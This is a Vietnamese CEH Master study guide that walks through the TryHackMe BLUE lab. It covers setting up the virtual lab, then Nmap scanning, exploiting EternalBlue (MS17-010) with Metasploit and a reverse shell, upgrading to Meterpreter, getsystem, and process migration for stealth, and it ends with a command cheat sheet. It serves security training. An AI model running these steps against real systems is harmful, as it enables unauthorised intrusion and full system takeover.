Lời Mở Đầu
Tài liệu này được biên soạn với mục đích cung cấp một hướng dẫn thực hành chi tiết dựa trên phòng lab “BLUE” của TryHackMe. Nội dung tập trung vào việc rèn luyện các kỹ năng và kiến thức chuyên sâu, cần thiết cho các thí sinh đang chuẩn bị cho kỳ thi Certified Ethical Hacker (CEH) Master. Kỳ thi CEH Master là một bài kiểm tra thực hành kéo dài, đòi hỏi thí sinh phải chứng minh năng lực áp dụng các kỹ thuật tấn công và phòng thủ trong một môi trường mô phỏng thực tế. Do đó, việc thực hành thường xuyên và có định hướng trên các phòng lab như BLUE đóng vai trò vô cùng quan trọng trong quá trình ôn luyện.
Tài liệu này sẽ bao gồm các phần chính: giới thiệu tổng quan về lab BLUE và những bài học cốt lõi có thể rút ra cho kỳ thi CEH Master; hướng dẫn chi tiết các bước chuẩn bị và cài đặt môi trường lab ảo trên nền tảng VMware Workstation chạy trên Windows, với máy tấn công là Kali Linux; phần thực hành từng bước các giai đoạn tấn công trong lab BLUE, từ thu thập thông tin, khai thác lỗ hổng đến leo thang đặc quyền; và cuối cùng là những khuyến cáo quan trọng dành cho các thí sinh đang hướng tới mục tiêu chinh phục chứng chỉ CEH Master.
I. Giới thiệu Lab BLUE và Các Bài học Trọng tâm cho CEH Master
Tổng quan về kịch bản lab BLUE trên TryHackMe
Lab BLUE được thiết kế như một máy chủ Windows cố tình để lại các lỗ hổng bảo mật, tạo điều kiện cho người học thực hành các kỹ thuật tấn công cơ bản. Trọng tâm của lab này xoay quanh một lỗ hổng cụ thể, nổi tiếng, cho phép người thực hành tập trung vào quy trình khai thác nó. Mặc dù được mô tả là một phòng lab dành cho người mới bắt đầu, các bước thực hiện trong BLUE – bao gồm thu thập thông tin (reconnaissance), khai thác (exploitation), và leo thang đặc quyền (privilege escalation) – lại phản ánh một cách chính xác chu trình tấn công cơ bản. Đây chính là nền tảng kiến thức và kỹ năng cần thiết để tiếp cận các kịch bản phức tạp hơn, thường gặp trong kỳ thi CEH Master. Mục tiêu cuối cùng của lab BLUE là giành được quyền kiểm soát cao nhất trên máy mục tiêu, cụ thể là quyền NT AUTHORITY\SYSTEM.
Liên kết các kỹ năng từ lab BLUE với yêu cầu của kỳ thi CEH Master
Kỳ thi CEH Master yêu cầu thí sinh phải chứng minh khả năng áp dụng thành thạo các kỹ thuật tấn công có đạo đức trong một môi trường giả lập mạng doanh nghiệp thực tế. Các kỹ năng được kiểm tra bao gồm quét mạng, phát hiện hệ điều hành, phân tích lỗ hổng, tấn công hệ thống, tấn công ứng dụng web, và nhiều kỹ thuật khác. Lab BLUE, với kịch bản của mình, trực tiếp giúp người học rèn luyện các kỹ năng thuộc các lĩnh vực quan trọng của CEH như “Scanning Networks” (Quét mạng), “Vulnerability Analysis” (Phân tích lỗ hổng), và “System Hacking” (Tấn công hệ thống).
Việc thực hành trên lab BLUE, dù có vẻ đơn giản, lại mang ý nghĩa quan trọng trong việc xây dựng nền tảng cho các kỹ thuật phức tạp hơn. Các công cụ và phương pháp luận cốt lõi được sử dụng trong lab này, như Nmap để quét mạng và Metasploit Framework để khai thác, là những công cụ mà kỳ thi CEH Master chắc chắn sẽ kiểm tra. Kỳ thi CEH Master bao gồm 20 thử thách đa dạng và diễn ra trong 6 giờ liên tục, đặt ra yêu cầu cao về khả năng vận dụng kiến thức và kỹ năng dưới áp lực thời gian. Việc thành thạo các bước cơ bản trên một mục tiêu dễ hiểu như máy BLUE giúp xây dựng sự tự tin và hiểu biết sâu sắc về cách thức hoạt động của các công cụ. Điều này cực kỳ quan trọng khi đối mặt với các kịch bản phức tạp, nơi mà thí sinh có thể không khai thác một lỗ hổng đơn giản như MS17-010 trong mọi thử thách, nhưng quy trình tìm kiếm, cấu hình và thực thi một exploit sẽ có nhiều điểm tương đồng. Do đó, việc hiểu rõ “tại sao” mỗi bước được thực hiện trong lab BLUE (ví dụ: tại sao chọn payload này, tại sao cần leo thang đặc quyền) quan trọng hơn là chỉ biết “làm thế nào” để hoàn thành lab.
Một khía cạnh quan trọng khác mà lab BLUE giúp rèn luyện là tầm quan trọng của việc xác định chính xác lỗ hổng. Lab BLUE có gợi ý về một lỗ hổng cụ thể thuộc dạng “ms??-???”. Trong thực tế kỳ thi CEH Master, khả năng phân tích kết quả từ các công cụ quét (ví dụ, Nmap) để suy luận ra các lỗ hổng tiềm năng và sau đó tiến hành xác minh chúng là một kỹ năng then chốt. Lab này cung cấp một ví dụ trực tiếp và dễ hiểu về quy trình này. Việc xác định sai lỗ hổng hoặc cấu hình sai các tham số của exploit sẽ làm lãng phí thời gian quý báu trong một kỳ thi có giới hạn thời gian chặt chẽ. Vì vậy, thí sinh cần rèn luyện kỹ năng phân tích kết quả quét một cách cẩn thận, liên kết các thông tin thu thập được (như phiên bản dịch vụ, cổng mở) với các mã định danh lỗ hổng phổ biến như CVE (Common Vulnerabilities and Exposures) hoặc các mã bản vá của Microsoft (MS).
II. Hướng dẫn Chuẩn bị và Cài đặt Môi trường Lab ảo
Yêu cầu phần cứng và phần mềm cho máy chủ Windows
Để thiết lập môi trường lab ảo một cách hiệu quả, máy tính chủ chạy hệ điều hành Windows cần đáp ứng các yêu cầu tối thiểu sau:
- Hệ điều hành: Windows 10 hoặc Windows 11 (phiên bản 64-bit).
- CPU (Bộ xử lý trung tâm): Tối thiểu 4 cores (lõi). Khuyến nghị sử dụng CPU có 8 cores trở lên để đảm bảo hiệu suất mượt mà khi chạy đồng thời nhiều máy ảo.
- RAM (Bộ nhớ truy cập ngẫu nhiên): Tối thiểu 8GB. Khuyến nghị 16GB RAM trở lên để các máy ảo hoạt động ổn định và không ảnh hưởng đến hiệu suất của máy chủ.
- Ổ cứng: Tối thiểu 100GB dung lượng trống. Sử dụng ổ cứng SSD (Solid State Drive) được khuyến nghị cao để cải thiện đáng kể tốc độ khởi động máy ảo và các thao tác đọc/ghi dữ liệu.
- Phần mềm ảo hóa: VMware Workstation Pro hoặc VMware Workstation Player. VMware Workstation Player là phiên bản miễn phí cho mục đích sử dụng cá nhân, trong khi Workstation Pro cung cấp nhiều tính năng nâng cao hơn.
- Kết nối Internet: Cần thiết để tải xuống các file cài đặt phần mềm và các ảnh máy ảo.
Hướng dẫn tải và cài đặt VMware Workstation
Người dùng có thể tải xuống bộ cài đặt VMware Workstation từ trang web chính thức của VMware. Đối với người dùng cá nhân, VMware Workstation Player là một lựa chọn tốt và miễn phí. Quá trình cài đặt VMware Workstation khá tiêu chuẩn: chạy file cài đặt đã tải về, chấp nhận các điều khoản sử dụng của nhà sản xuất, và chọn thư mục cài đặt mong muốn. Trong một số trường hợp, hệ thống có thể yêu cầu khởi động lại máy tính sau khi quá trình cài đặt hoàn tất để áp dụng các thay đổi.
Hướng dẫn tải và cấu hình máy ảo Kali Linux trên VMware
Máy ảo Kali Linux sẽ đóng vai trò là máy tấn công trong kịch bản lab này.
- Tải ảnh máy ảo Kali Linux:
- Điều quan trọng hàng đầu là luôn tải ảnh máy ảo Kali Linux từ trang web chính thức của Kali Linux (kali.org). Việc này nhằm đảm bảo tính toàn vẹn của file và tránh nguy cơ tải phải các phiên bản đã bị chỉnh sửa hoặc chứa phần mềm độc hại.
- Trên trang tải xuống, nên chọn phiên bản “Virtual Machines” (Máy ảo) đã được cấu hình sẵn cho VMware. Các phiên bản này thường ở định dạng .ova (Open Virtualization Appliance) hoặc là một file nén chứa file cấu hình .vmx và các file đĩa ảo. Sử dụng ảnh máy ảo dựng sẵn giúp tiết kiệm thời gian so với việc cài đặt Kali Linux từ file ISO.
- Sau khi tải về, nếu có thể, nên thực hiện việc xác minh checksum (ví dụ: SHA256SUM) của file đã tải với giá trị checksum được cung cấp trên trang web chính thức. Bước này giúp đảm bảo file không bị lỗi hoặc bị thay đổi trong quá trình tải xuống.
- Triển khai máy ảo Kali Linux trên VMware:
- Mở ứng dụng VMware Workstation.
- Nếu file tải về là định dạng .ova, chọn “File” > “Open” từ menu, sau đó duyệt đến và chọn file .ova của Kali Linux. Làm theo các hướng dẫn trên màn hình để import máy ảo vào VMware.
- Nếu file tải về là một file nén (ví dụ: .7z hoặc .zip), trước tiên cần giải nén file này ra một thư mục. Sau đó, trong VMware Workstation, chọn “File” > “Open” và duyệt đến file có phần mở rộng .vmx nằm trong thư mục vừa giải nén.
- Trong quá trình mở hoặc import, VMware có thể hiển thị một hộp thoại hỏi rằng máy ảo này đã được di chuyển hay sao chép (“Moved It” or “Copied It”). Nên chọn “I Copied It” để VMware tạo một định danh mới cho máy ảo.
- Cấu hình ban đầu cho Kali Linux:
- Tên người dùng và mật khẩu mặc định cho các ảnh máy ảo Kali Linux chính thức thường là kali cho cả hai.
- Một trong những việc đầu tiên cần làm sau khi đăng nhập thành công là thay đổi mật khẩu mặc định. Mở một cửa sổ terminal và sử dụng lệnh passwd để đặt mật khẩu mới.
- Tiếp theo, nên cập nhật hệ thống để đảm bảo tất cả các gói phần mềm và công cụ đều là phiên bản mới nhất. Sử dụng lệnh sau trong terminal: sudo apt update && sudo apt full-upgrade -y.
- Cấu hình tài nguyên cho máy ảo Kali Linux: Trong phần cài đặt (Settings) của máy ảo trong VMware, nên cấp phát tối thiểu 2 CPU cores và 2GB RAM. Tuy nhiên, để có hiệu suất tốt hơn, khuyến nghị cấp phát 4GB RAM trở lên.
Hướng dẫn tải và triển khai máy ảo BLUE (máy mục tiêu) trên VMware
Máy ảo BLUE, đóng vai trò là máy mục tiêu dễ bị tấn công, có thể được tải về để sử dụng offline từ địa chỉ web https://darkstar7471.com/resources.html. File tải về cho máy ảo BLUE cũng có thể ở định dạng .ova hoặc là một file nén chứa file .vmx. Quá trình triển khai máy ảo BLUE trên VMware Workstation tương tự như các bước đã thực hiện với máy ảo Kali Linux: mở file .ova hoặc file .vmx bằng VMware Workstation. Đối với máy ảo BLUE, việc cấp phát tài nguyên có thể ở mức vừa phải, ví dụ 1-2 CPU cores và 1-2GB RAM là đủ cho các mục đích của lab này.
Cấu hình card mạng cho máy ảo Kali Linux và BLUE
Cấu hình mạng đúng cách là một bước cực kỳ quan trọng để đảm bảo máy ảo Kali Linux có thể “nhìn thấy” và tấn công máy ảo BLUE. Đồng thời, cả hai máy ảo (hoặc ít nhất là máy Kali) cần có khả năng truy cập Internet để cập nhật phần mềm hoặc tải thêm công cụ nếu cần.
- Mục tiêu cấu hình: Đảm bảo máy ảo Kali Linux và máy ảo BLUE nằm trên cùng một mạng ảo và có thể giao tiếp với nhau.
- Phương án 1: Sử dụng NAT Network (Khuyến nghị cho sự đơn giản và cô lập):
- Trong phần cài đặt mạng (Network Adapter settings) của cả máy ảo Kali Linux và máy ảo BLUE trong VMware, chọn chế độ “NAT”.
- Ở chế độ NAT, các máy ảo sẽ sử dụng địa chỉ IP của máy tính chủ (máy thật chạy Windows) để giao tiếp với mạng bên ngoài (Internet). Chúng sẽ được VMware cấp phát địa chỉ IP từ một dịch vụ DHCP ảo, thường nằm trên một dải mạng riêng ảo do VMware quản lý (ví dụ, VMnet8). Điều này cho phép các máy ảo giao tiếp với nhau và với Internet, đồng thời vẫn được cô lập ở một mức độ nhất định so với mạng vật lý của người dùng.
- Phương án 2: Sử dụng Bridged Network (Ít khuyến nghị hơn cho lab này trừ khi có lý do cụ thể):
- Ở chế độ Bridged, máy ảo sẽ hoạt động như một thiết bị độc lập trên mạng vật lý của người dùng, nhận địa chỉ IP trực tiếp từ router của mạng đó. Cần cẩn trọng hơn khi sử dụng chế độ này, vì máy ảo mục tiêu (BLUE) sẽ lộ diện trên mạng LAN cục bộ.
- Phương án 3: Sử dụng Host-Only Network (Nếu muốn cô lập hoàn toàn):
- Ở chế độ Host-Only, các máy ảo chỉ có thể giao tiếp với nhau và với máy tính chủ. Chúng sẽ không có kết nối Internet. Chế độ này phù hợp khi muốn tạo một môi trường lab hoàn toàn biệt lập.
Sau khi cấu hình card mạng cho cả hai máy ảo (ví dụ, cùng đặt ở chế độ NAT), hãy khởi động chúng. Từ máy ảo Kali Linux, có thể thử kiểm tra kết nối đến máy ảo BLUE. Tuy nhiên, cần lưu ý rằng lab BLUE được thiết kế để không phản hồi các gói tin ICMP (ping). Do đó, việc kiểm tra kết nối hiệu quả hơn sẽ dựa vào kết quả quét cổng ở các bước sau.
Tầm quan trọng của việc cấu hình mạng chính xác không thể bị xem nhẹ. Một trong những vấn đề phổ biến nhất mà người dùng gặp phải khi thiết lập các phòng lab ảo chính là cấu hình mạng sai, dẫn đến tình trạng máy tấn công không thể tiếp cận được máy mục tiêu. Việc hiểu rõ các chế độ mạng khác nhau của VMware (NAT, Bridged, Host-Only) và cách chúng ảnh hưởng đến kết nối giữa các máy ảo cũng như kết nối ra Internet là rất quan trọng. Trong kỳ thi CEH Master, các thử thách có thể liên quan đến nhiều máy ảo được đặt trên các phân đoạn mạng (network segments) khác nhau. Do đó, kỹ năng cấu hình và gỡ lỗi các vấn đề về mạng ảo là vô giá. Dành thời gian để hiểu rõ và xác minh cấu hình mạng trước khi bắt đầu thực hành sẽ giúp tiết kiệm rất nhiều thời gian và tránh được sự thất vọng không đáng có sau này.
III. Hướng dẫn Thực hành Chi tiết Lab BLUE từng bước
Sau khi đã chuẩn bị và cài đặt xong môi trường lab ảo, bao gồm máy tấn công Kali Linux và máy mục tiêu BLUE, bước tiếp theo là tiến hành thực hành các giai đoạn tấn công.
Khởi động các máy ảo
Đảm bảo rằng cả máy ảo Kali Linux và máy ảo BLUE đều đã được khởi động và đang chạy ổn định trên VMware Workstation. Máy BLUE có thể cần một vài phút để khởi động hoàn toàn các dịch vụ của nó.
Xác định địa chỉ IP của máy BLUE
Để có thể tấn công máy BLUE, trước tiên cần phải biết địa chỉ IP của nó trong mạng ảo. Nếu cả hai máy ảo được cấu hình ở chế độ NAT, chúng sẽ được cấp IP từ dịch vụ DHCP của VMware. Từ máy Kali Linux, có thể sử dụng các công cụ quét mạng để tìm địa chỉ IP của máy BLUE.
- Một cách là sử dụng lệnh netdiscover (nếu chưa có, cài đặt bằng sudo apt install netdiscover):
sudo netdiscover -r <DẢI_MẠNG_NAT_CỦA_BẠN>/24
(Ví dụ: sudo netdiscover -r 192.168.100.0/24. Dải mạng NAT có thể xem trong Virtual Network Editor của VMware). - Một cách khác là sử dụng Nmap để quét ping các máy trong dải mạng:
nmap -sn <DẢI_MẠNG_NAT_CỦA_BẠN>/24
Tuy nhiên, như đã đề cập, máy BLUE được cấu hình để không phản hồi các gói tin ICMP (ping). Do đó, lệnh nmap -sn có thể không phát hiện ra máy BLUE. Một phương pháp hiệu quả hơn trong trường hợp này là thực hiện một quét cổng cơ bản trên toàn dải mạng để tìm các máy chủ đang hoạt động và có cổng mở, điều này sẽ được thực hiện ở giai đoạn tiếp theo. Giả sử sau khi xác định, địa chỉ IP của máy BLUE là IP_BLUE.
Giai đoạn 1: Thu thập Thông tin (Reconnaissance & Scanning)
Mục tiêu của giai đoạn này là khám phá các cổng đang mở, các dịch vụ đang chạy trên các cổng đó, phiên bản của các dịch vụ và hệ điều hành của máy BLUE. Thông tin này sẽ giúp xác định các điểm yếu tiềm năng có thể khai thác.
- Sử dụng Nmap trên Kali Linux:
Mở một cửa sổ terminal trên máy ảo Kali Linux. - Lệnh quét cơ bản để xác định các cổng mở và phiên bản dịch vụ:
nmap -sV IP_BLUE
Trong đó: - -sV: Yêu cầu Nmap cố gắng xác định phiên bản của các dịch vụ đang chạy trên các cổng mở.
- Để có một cái nhìn toàn diện hơn, có thể thực hiện một lệnh quét sâu hơn, bao gồm tất cả các cổng TCP và chạy các script mặc định của Nmap để thu thập thêm thông tin (bao gồm cả việc phát hiện một số lỗ hổng phổ biến):
nmap -p- -sC -sV -oN nmap_blue_results.txt IP_BLUE
Trong đó:
- -p-: Quét tất cả 65535 cổng TCP.
- -sC: Chạy các script mặc định của Nmap (tương đương với –script=default).
- -oN nmap_blue_results.txt: Lưu kết quả quét vào một file có tên nmap_blue_results.txt ở định dạng chuẩn của Nmap.
- Phân tích kết quả Nmap:
Sau khi quá trình quét hoàn tất, mở file nmap_blue_results.txt (hoặc xem trực tiếp output trên terminal) để phân tích. - Tìm kiếm các cổng đáng ngờ đang mở. Đối với một máy Windows, các cổng thường được chú ý bao gồm:
- Cổng 139 (NetBIOS Session Service)
- Cổng 445 (Microsoft-DS – SMB over TCP)
- Cổng 3389 (RDP – Remote Desktop Protocol)
- Chú ý đến thông tin phiên bản của các dịch vụ được Nmap phát hiện. Ví dụ, nếu Nmap xác định được rằng máy chủ đang chạy một phiên bản cũ của dịch vụ Microsoft Windows SMB, điều này có thể là một dấu hiệu mạnh mẽ cho thấy sự tồn tại của lỗ hổng EternalBlue (mã định danh MS17-010). Gợi ý trong mô tả lab về một lỗ hổng dạng “ms??-???” càng củng cố giả thuyết này.
- Xác định hệ điều hành của máy mục tiêu. Nmap thường có khả năng đoán khá chính xác hệ điều hành dựa trên các phản hồi mạng.
Kết quả Nmap có thể chứa rất nhiều thông tin, và đối với người mới bắt đầu, việc lọc ra những chi tiết quan trọng có thể gây choáng ngợp. Kỳ thi CEH Master đòi hỏi khả năng nhanh chóng xác định thông tin hữu ích từ một lượng lớn dữ liệu. Lab BLUE, với một lỗ hổng SMB tương đối rõ ràng, là một cơ hội tốt để thực hành kỹ năng này. Thay vì chỉ nhìn vào danh sách các cổng đang mở, điều quan trọng là phải liên kết chúng với các dịch vụ cụ thể (ví dụ, cổng 445 thường liên quan đến dịch vụ SMB) và sau đó là các lỗ hổng tiềm ẩn đã biết liên quan đến dịch vụ hoặc phiên bản cụ thể đó. Nên tập trung tìm kiếm các “từ khóa” trong kết quả Nmap, chẳng hạn như “Microsoft Windows SMB”, “Workstation Service”, và học cách sử dụng thông tin về phiên bản dịch vụ để tìm kiếm các exploit đã được công bố.
Giai đoạn 2: Khai thác Lỗ hổng và Giành quyền Truy cập (Exploitation & Gaining Access)
Sau khi đã xác định được các lỗ hổng tiềm năng từ giai đoạn thu thập thông tin, mục tiêu của giai đoạn này là sử dụng các công cụ và kỹ thuật để khai thác một trong số các lỗ hổng đó và giành quyền truy cập ban đầu vào máy BLUE. Dựa trên kết quả Nmap và các gợi ý, lỗ hổng MS17-010 (EternalBlue) là ứng cử viên hàng đầu.
- Khởi động và sử dụng Metasploit Framework trên Kali Linux:
Metasploit Framework là một công cụ mạnh mẽ, chứa một bộ sưu tập lớn các exploit, payload và các module phụ trợ khác. - Mở một cửa sổ terminal mới trên Kali và khởi động Metasploit console bằng lệnh:
msfconsole
- Tìm kiếm module exploit:
Sau khi msfconsole đã tải xong, sử dụng lệnh search để tìm kiếm các module exploit liên quan đến MS17-010:
search ms17-010
Metasploit sẽ liệt kê các module phù hợp. Module exploit/windows/smb/ms17_010_eternalblue là lựa chọn phổ biến và hiệu quả để khai thác lỗ hổng này. - Lựa chọn và cấu hình module exploit:
- Chọn module exploit đã tìm thấy:
use exploit/windows/smb/ms17_010_eternalblue - Sau khi chọn module, xem các tùy chọn (options) cần thiết phải cấu hình cho exploit này bằng lệnh:
show options
Các tùy chọn quan trọng thường bao gồm:
- RHOSTS: Địa chỉ IP của máy mục tiêu (Remote Hosts). Thiết lập giá trị này bằng địa chỉ IP của máy BLUE:
set RHOSTS IP_BLUE - LHOST: Địa chỉ IP của máy tấn công (Local Host), nơi mà payload sẽ kết nối trở lại. Trong trường hợp sử dụng mạng NAT, đây phải là địa chỉ IP của máy Kali Linux trên dải mạng NAT đó (ví dụ, IP của card eth0 trên Kali). Có thể kiểm tra IP của Kali bằng lệnh ip addr trong một terminal khác.
set LHOST <IP_KALI_TRÊN_MẠNG_NAT> - Thiết lập payload:
Payload là đoạn mã sẽ được thực thi trên máy mục tiêu sau khi exploit thành công. Lab BLUE hướng dẫn cụ thể việc sử dụng payload windows/x64/shell/reverse_tcp:
set payload windows/x64/shell/reverse_tcp
Payload này sẽ tạo một kết nối shell ngược từ máy nạn nhân (BLUE) về máy tấn công (Kali). Điều này có nghĩa là máy BLUE sẽ chủ động kết nối ra ngoài đến máy Kali, giúp vượt qua một số loại firewall cơ bản. - Sau khi thiết lập payload, nên xem lại các tùy chọn của payload bằng lệnh show options một lần nữa để đảm bảo LHOST và LPORT (cổng lắng nghe trên máy Kali, mặc định thường là 4444) đã được đặt đúng.
- Thực thi exploit:
Khi tất cả các tùy chọn cần thiết đã được cấu hình, thực thi exploit bằng lệnh:
exploit
Hoặc có thể dùng lệnh:
run
Nếu exploit thành công, Metasploit sẽ thông báo và người dùng sẽ nhận được một session, thường là một giao diện dòng lệnh (command prompt hoặc shell) của máy Windows BLUE. Có thể cần nhấn Enter một vài lần để dấu nhắc lệnh xuất hiện.
Việc chọn đúng payload và cấu hình chính xác các tùy chọn LHOST và RHOSTS là cực kỳ quan trọng để exploit thành công. LHOST phải là địa chỉ IP mà máy nạn nhân có thể kết nối trở lại được. Trong môi trường mạng NAT của VMware, đây chính là địa chỉ IP của máy Kali trên mạng ảo VMnet đó. RHOSTS là địa chỉ IP của máy mục tiêu. Một sai lầm nhỏ trong việc cấu hình các tham số này thường dẫn đến thất bại của quá trình khai thác. Hướng dẫn của lab BLUE đặc biệt chỉ ra việc thiết lập payload, nhấn mạnh tầm quan trọng của bước này trong quá trình học tập và thực hành. Cần hiểu rõ sự khác biệt giữa LHOST (máy của bạn, nơi nhận kết nối) và RHOSTS (máy mục tiêu, nơi gửi kết nối), và tại sao payload reverse_tcp lại phổ biến (nó thường dễ dàng vượt qua các firewall hơn so với payload bind_tcp, vốn yêu cầu máy nạn nhân mở một cổng lắng nghe).
Giai đoạn 3: Leo thang Đặc quyền (Privilege Escalation)
Sau khi đã giành được quyền truy cập ban đầu vào máy BLUE (thường là một shell với quyền của người dùng thông thường hoặc dịch vụ), mục tiêu tiếp theo là nâng cấp quyền hạn lên mức cao nhất, tức là NT AUTHORITY\SYSTEM.
- Background shell hiện tại (nếu cần):
Nếu đang ở trong session shell vừa giành được, có thể đưa nó vào chế độ nền (background) để quay lại giao diện msfconsole và thực hiện các lệnh khác. Nhấn tổ hợp phím CTRL + Z.
Sau đó, gõ lệnh sessions hoặc sessions -l để xem danh sách các session đang hoạt động và ID của chúng. - Nâng cấp từ shell cơ bản lên Meterpreter session:
Meterpreter là một payload nâng cao của Metasploit, cung cấp nhiều chức năng mạnh mẽ và linh hoạt hơn một shell dòng lệnh thông thường. Nó cho phép thực hiện nhiều tác vụ hậu khai thác (post-exploitation) một cách dễ dàng.
- Lab BLUE gợi ý sử dụng một post module để chuyển đổi session shell hiện tại sang một Meterpreter session. Module thường được sử dụng cho mục đích này là post/multi/manage/shell_to_meterpreter.
- Sử dụng module này:
use post/multi/manage/shell_to_meterpreter - Xem các tùy chọn của module:
show options
Tùy chọn quan trọng nhất cần thiết lập là SESSION, đây là ID của session shell mà bạn vừa giành được ở bước trước.
set SESSION <ID_CUA_SHELL_SESSION> - Thực thi module:
run - Nếu thành công, một session Meterpreter mới sẽ được tạo. Sử dụng lệnh sessions để xem lại danh sách và ID của session Meterpreter mới. Sau đó, tương tác với session Meterpreter này bằng lệnh:
sessions -i <ID_METERPRETER_SESSION>
(Ví dụ: sessions -i 2 nếu ID của Meterpreter session là 2). - Sử dụng các lệnh Meterpreter để leo thang đặc quyền:
Khi đã ở trong giao diện Meterpreter, có nhiều kỹ thuật và lệnh có thể được sử dụng để cố gắng leo thang đặc quyền. - Lệnh phổ biến và thường được thử đầu tiên là getsystem. Lệnh này sẽ tự động thử một số kỹ thuật khác nhau để cố gắng giành quyền NT AUTHORITY\SYSTEM.
getsystem - Xác minh quyền hạn:
Sau khi lệnh getsystem thực thi (hy vọng là thành công), hoặc nếu session Meterpreter ban đầu đã có quyền SYSTEM, cần xác minh lại quyền hạn hiện tại.
- Trong Meterpreter, sử dụng lệnh:
getuid - Hoặc, có thể mở một shell DOS từ Meterpreter bằng lệnh shell, sau đó gõ lệnh whoami để xem tên người dùng hiện tại.
shell
(Sau đó trong shell DOS)
whoami
Kết quả mong đợi là NT AUTHORITY\SYSTEM. - Thực hiện di chuyển tiến trình (process migration):
- Lý do: Session Meterpreter hiện tại có thể đang chạy trong một tiến trình (process) không ổn định, dễ bị người dùng hoặc phần mềm diệt virus phát hiện và chấm dứt. Di chuyển Meterpreter sang một tiến trình hệ thống khác, ổn định hơn và ít bị chú ý hơn (ví dụ, services.exe hoặc một tiến trình svchost.exe đang chạy với quyền SYSTEM) giúp duy trì truy cập một cách bền vững hơn. Cần cẩn trọng khi chọn tiến trình để di chuyển, tránh các tiến trình quan trọng mà việc can thiệp có thể gây treo hệ thống (ví dụ, lsass.exe chứa thông tin đăng nhập, việc di chuyển vào đây có thể gây rủi ro nếu không cẩn thận).
- Liệt kê các tiến trình đang chạy trên máy mục tiêu bằng lệnh ps trong Meterpreter:
ps - Xem danh sách các tiến trình, tìm một tiến trình phù hợp (thường là các tiến trình đang chạy với quyền NT AUTHORITY\SYSTEM, có thể nhận biết qua cột User hoặc tìm các tiến trình có PID lớn, thường là các dịch vụ hệ thống).
- Di chuyển Meterpreter sang tiến trình đó bằng lệnh migrate theo sau là Process ID (PID) của tiến trình mục tiêu:
migrate <PID_CUA_TIEN_TRINH_DICH>
(Ví dụ: migrate 1234 nếu PID của tiến trình đích là 1234). - Lab BLUE cũng lưu ý rằng việc di chuyển tiến trình không phải lúc nào cũng thành công ngay lần đầu và có thể không ổn định. Nếu thất bại, có thể cần thử lại với một tiến trình khác, hoặc thậm chí phải thực hiện lại toàn bộ quá trình khai thác và nâng cấp shell nếu session bị mất.
Quá trình leo thang đặc quyền và di chuyển tiến trình có thể tiềm ẩn sự phức tạp và không ổn định. Mô tả của lab BLUE thẳng thắn thừa nhận rằng việc di chuyển tiến trình “không ổn định lắm” và “có thể mất vài lần thử”. Điều này phản ánh rất đúng thực tế trong lĩnh vực kiểm thử xâm nhập. Trong kỳ thi CEH Master, không phải mọi kỹ thuật đều hoạt động trơn tru ngay từ lần thử đầu tiên. Khả năng gỡ lỗi, thử các phương pháp thay thế (ví dụ, nếu getsystem thất bại, có thể tìm kiếm và sử dụng các exploit leo thang đặc quyền cục bộ khác dựa trên phiên bản Windows và các bản vá đã được cài đặt, nếu có thể xác định được) là một kỹ năng rất quan trọng. Do đó, người học cần được chuẩn bị tâm lý rằng không phải lúc nào mọi thứ cũng diễn ra suôn sẻ. Sự kiên nhẫn, khả năng tìm tòi và thử nghiệm các phương án dự phòng sẽ là chìa khóa để vượt qua các thử thách.
Bảng Tóm tắt Các Lệnh và Công cụ Quan trọng trong Lab BLUE
Bảng dưới đây tóm tắt các lệnh và công cụ chính được sử dụng trong quá trình thực hành lab BLUE. Việc tham khảo bảng này giúp người học củng cố kiến thức và dễ dàng xem lại khi cần. Đối với kỳ thi CEH Master, việc nhớ cú pháp chính xác của các lệnh thường dùng dưới áp lực thời gian là rất quan trọng.
| Công cụ (Tool) | Lệnh/Module Chính (Key Command/Module) | Mục đích (Purpose) |
| Nmap | nmap -sV -p- -sC IP_BLUE | Quét toàn diện cổng, dịch vụ, phiên bản, chạy script cơ bản. |
| Metasploit Framework | msfconsole | Khởi chạy Metasploit framework. |
| Metasploit Framework | search ms17-010 | Tìm kiếm exploit cho lỗ hổng MS17-010. |
| Metasploit Framework | use exploit/windows/smb/ms17_010_eternalblue | Chọn module exploit EternalBlue. |
| Metasploit Framework | set RHOSTS IP_BLUE | Thiết lập địa chỉ IP của máy mục tiêu. |
| Metasploit Framework | set LHOST <IP_KALI> | Thiết lập địa chỉ IP của máy tấn công (cho reverse shell). |
| Metasploit Framework | set PAYLOAD windows/x64/shell/reverse_tcp | Thiết lập payload reverse shell 64-bit cho Windows. |
| Metasploit Framework | exploit / run | Thực thi exploit đã cấu hình. |
| Metasploit Framework | sessions -l | Liệt kê các session đang hoạt động. |
| Metasploit Framework | sessions -i <ID> | Tương tác với session được chọn theo ID. |
| Metasploit Framework | use post/multi/manage/shell_to_meterpreter | Chọn module để nâng cấp một shell cơ bản lên Meterpreter. |
| Metasploit Framework | set SESSION <ID_SHELL_SESSION> | Thiết lập ID của session shell cần được nâng cấp. |
| Meterpreter | getsystem | Cố gắng leo thang đặc quyền lên NT AUTHORITY\SYSTEM. |
| Meterpreter | getuid / whoami (thông qua lệnh shell) | Kiểm tra quyền người dùng hiện tại của session Meterpreter. |
| Meterpreter | ps | Liệt kê các tiến trình đang chạy trên máy mục tiêu. |
| Meterpreter | migrate <PID> | Di chuyển session Meterpreter sang một tiến trình khác theo PID. |
Bảng tóm tắt này đóng vai trò như một “cheat sheet” ban đầu, giúp người học nhanh chóng thực hành lại các bước hoặc tham khảo khi thực hiện các lab tương tự, từ đó xây dựng sự quen thuộc và tốc độ cần thiết cho các bài thi thực hành.
IV. Các Bài học Chính Rút ra từ Lab BLUE cho Luyện thi CEH Master
Việc hoàn thành lab BLUE không chỉ đơn thuần là việc xâm nhập thành công một máy tính, mà còn mang lại nhiều bài học giá trị, đặc biệt hữu ích cho quá trình chuẩn bị cho kỳ thi CEH Master.
- Tầm quan trọng của việc thu thập thông tin chính xác và toàn diện (Reconnaissance):
